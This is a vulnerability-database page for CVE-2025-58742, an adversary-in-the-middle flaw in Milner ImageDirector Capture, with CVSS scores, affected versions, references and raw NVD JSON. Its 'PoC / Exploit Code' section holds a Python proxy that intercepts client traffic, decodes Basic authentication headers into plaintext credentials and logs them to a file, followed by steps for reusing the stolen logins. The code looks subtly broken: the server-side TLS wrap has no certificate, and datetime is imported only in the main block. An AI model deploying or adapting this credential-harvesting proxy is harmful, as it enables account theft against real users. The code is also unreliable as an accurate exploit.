CVE-2025-58742

Description

Insufficiently Protected Credentials, Improper Restriction of Communication Channel to Intended Endpoints vulnerability in the Connection Settings dialog in Milner ImageDirector Capture on Windows allows Adversary in the Middle (AiTM) by modifying the 'Server' field to redirect client authentication.This issue affects ImageDirector Capture: from 7.0.9 before 7.6.3.25808.

CVSS Details

CVSS Score

5.9

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:H/A:N

Configurations (Affected Products)

cpe:2.3:a:milner:imagedirector_capture:*:*:*:*:*:*:*:* - VULNERABLE

cpe:2.3:o:microsoft:windows:-:*:*:*:*:*:*:* - NOT VULNERABLE

Milner ImageDirector Capture 7.0.9

Milner ImageDirector Capture < 7.6.3.25808

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

# CVE-2025-58742 PoC - ImageDirector Capture AiTM Attack
# This PoC demonstrates the MITM vulnerability in ImageDirector Capture

import socket
import ssl
import threading
import base64
import json

class AiTMProxy:
    def __init__(self, attacker_port=8443, target_server='legitimate-server.com', target_port=443):
        self.attacker_port = attacker_port
        self.target_server = target_server
        self.target_port = target_port
        self.captured_credentials = []
    
    def start_proxy(self):
        """Start the AiTM proxy server"""
        server_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        server_socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
        server_socket.bind(('0.0.0.0', self.attacker_port))
        server_socket.listen(5)
        print(f"[*] AiTM Proxy listening on port {self.attacker_port}")
        
        while True:
            client_socket, addr = server_socket.accept()
            print(f"[*] Connection from {addr}")
            threading.Thread(target=self.handle_client, args=(client_socket,)).start()
    
    def handle_client(self, client_socket):
        """Handle client connection and forward to target"""
        try:
            # Connect to legitimate server
            target_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
            target_socket.connect((self.target_server, self.target_port))
            
            # Wrap with SSL for HTTPS
            context = ssl.create_default_context()
            target_ssl = context.wrap_socket(target_socket, server_hostname=self.target_server)
            client_ssl = context.wrap_socket(client_socket, server_side=True)
            
            # Intercept and log credentials
            self.intercept_traffic(client_ssl, target_ssl)
        except Exception as e:
            print(f"[!] Error: {e}")
    
    def intercept_traffic(self, client, server):
        """Intercept and log authentication data"""
        try:
            while True:
                data = client.recv(4096)
                if not data:
                    break
                
                # Log captured authentication data
                if b'Authorization' in data or b'Basic' in data:
                    self.log_credentials(data)
                
                # Forward to legitimate server
                server.sendall(data)
                response = server.recv(4096)
                client.sendall(response)
        except:
            pass
        finally:
            client.close()
            server.close()
    
    def log_credentials(self, data):
        """Extract and log credentials"""
        for line in data.decode('utf-8', errors='ignore').split('\r\n'):
            if 'Authorization:' in line or 'Basic ' in line:
                cred = line.split(' ')[-1]
                decoded = base64.b64decode(cred).decode('utf-8', errors='ignore')
                self.captured_credentials.append({
                    'timestamp': str(datetime.now()),
                    'credential': decoded
                })
                print(f"[!] Captured credentials: {decoded}")
                
                # Save to file
                with open('captured_creds.json', 'a') as f:
                    json.dump(self.captured_credentials[-1], f)
                    f.write('\n')

# Exploitation steps:
# 1. Attacker sets up this proxy server
# 2. User modifies ImageDirector Capture 'Server' field to point to attacker IP
# 3. When user authenticates, credentials are captured by proxy
# 4. Attacker uses captured credentials to authenticate to real server

if __name__ == "__main__":
    from datetime import datetime
    proxy = AiTMProxy(attacker_port=8443, target_server='legitimate-server.com')
    proxy.start_proxy()

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-58742
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-58742
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-58742/
[4] VulDB https://vuldb.com/cve/CVE-2025-58742
[5] https://sra.io/advisories

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-58742", "sourceIdentifier": "57dba5dd-1a03-47f6-8b36-e84e47d335d8", "published": "2026-01-20T22:15:51.630", "lastModified": "2026-02-10T16:51:44.103", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Insufficiently Protected Credentials, Improper Restriction of Communication Channel to Intended Endpoints vulnerability in the Connection Settings dialog in Milner ImageDirector Capture on Windows allows Adversary in the Middle (AiTM) by modifying the 'Server' field to redirect client authentication.This issue affects ImageDirector Capture: from 7.0.9 before 7.6.3.25808."}, {"lang": "es", "value": "Credenciales Insuficientemente Protegidas, Restricción Inadecuada del Canal de Comunicación a los Puntos Finales Previstos vulnerabilidad en el diálogo de Configuración de Conexión en Milner ImageDirector Capture en Windows permite Adversario en el Medio (AiTM) al modificar el campo 'Servidor' para redirigir la autenticación del cliente. Este problema afecta a ImageDirector Capture: desde 7.0.9 antes de 7.6.3.25808."}], "metrics": {"cvssMetricV40": [{"source": "57dba5dd-1a03-47f6-8b36-e84e47d335d8", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:H/VI:L/VA:H/SC:H/SI:H/SA:H/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.5, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "HIGH", "subIntegrityImpact": "HIGH", "subAvailabilityImpact": "HIGH", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:H/A:N", "baseScore": 5.9, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.2, "impactScore": 3.6}]}, "weaknesses": [{"source": "57dba5dd-1a03-47f6-8b36-e84e47d335d8", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-522"}, {"lang": "en", "value": "CWE-923"}]}, {"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-522"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:milner:imagedirector_capture:*:*:*:*:*:*:*:*", "versionStartIncluding": "7.0.9", "versionEndExcluding": "7.6.3.25808", "matchCriteriaId": "8D1B57A0-F2D5-41A7-BA72-4F2FE59FF416"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:o:microsoft:windows:-:*:*:*:*:*:*:*", "matchCriteriaId": "A2572D17-1DE6-457B-99CC-64AFD54487EA"}]}]}], "references": [{"url": "https://sra.io/advisories", "source": "57dba5dd-1a03-47f6-8b36-e84e47d335d8", "tags": ["Third Party Advisory"]}]}}